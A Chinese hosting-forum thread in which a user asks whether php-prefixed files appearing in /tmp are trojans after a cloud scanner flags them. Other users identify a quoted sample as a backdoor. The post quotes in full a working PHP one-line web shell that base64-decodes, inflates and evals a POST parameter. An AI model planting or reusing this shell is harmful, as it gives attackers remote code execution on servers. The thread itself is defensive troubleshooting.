请教大佬，这是木马吗

guoaibing · 发表于 2019-8-18 17:49:07

/tmp目录下，总是会生成php前缀的文件，

虽然没啥影响，不过腾讯云云镜老是提示是木马文件，大佬们遇到过这情况没

酷酷猫 · 发表于 2019-8-18 17:53:41

提示: 作者被禁止或删除内容自动屏蔽

guoaibing · 发表于 2019-8-18 17:58:21

酷酷猫发表于 2019-8-18 17:53
你看看文件里面是什么代码

各种各样的都有
有的是代码

Ra<?php function a($a){@eval(@gzinflate($a));} function b($b){return base64_decode($b);} @a(@b($_POST['zs']));?>

复制代码

有的文件是链接像是推广。。不管了

苁林老鬼 · 发表于 2019-8-18 17:59:08

guoaibing 发表于 2019-8-18 17:58
各种各样的都有
有的是代码

这是一句话

my49cn · 发表于 2019-8-18 17:59:55

eval和$_POST搭配在一起用一定是被挂马了

upo · 发表于 2019-8-18 18:02:48

提示: 作者被禁止或删除内容自动屏蔽

guoaibing · 发表于 2019-8-18 18:03:49

my49cn 发表于 2019-8-18 17:59
eval和$_POST搭配在一起用一定是被挂马了

大佬，在/tmp目录下有影响吗这情况貌似一直有，没发现有啥影响

酷酷猫 · 发表于 2019-8-18 18:05:56

提示: 作者被禁止或删除内容自动屏蔽

1941368542 · 发表于 2019-8-18 18:18:52

guoaibing 发表于 2019-8-18 17:58
各种各样的都有
有的是代码

一看就是一句话了，POST里面就是密码了把。

my49cn · 发表于 2019-8-18 18:23:12

guoaibing 发表于 2019-8-18 18:03
大佬，在/tmp目录下有影响吗这情况貌似一直有，没发现有啥影响

只要这个文件能被调用。就会有影响。你检查下有没有什么东西加载了tmp目录下的这些文件。

		自动登录	找回密码
密码			注册

酷酷猫酷酷猫当前离线积分 4596	发表于 2019-8-18 17:53:41 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
酷酷猫酷酷猫当前离线积分 4596
	回复支持反对举报

upo upo 当前离线积分 16985	发表于 2019-8-18 18:02:48 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
upo upo 当前离线积分 16985
	回复支持反对举报

酷酷猫酷酷猫当前离线积分 4596	发表于 2019-8-18 18:05:56 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
酷酷猫酷酷猫当前离线积分 4596
	回复支持反对举报

[lighttpd] 请教大佬，这是木马吗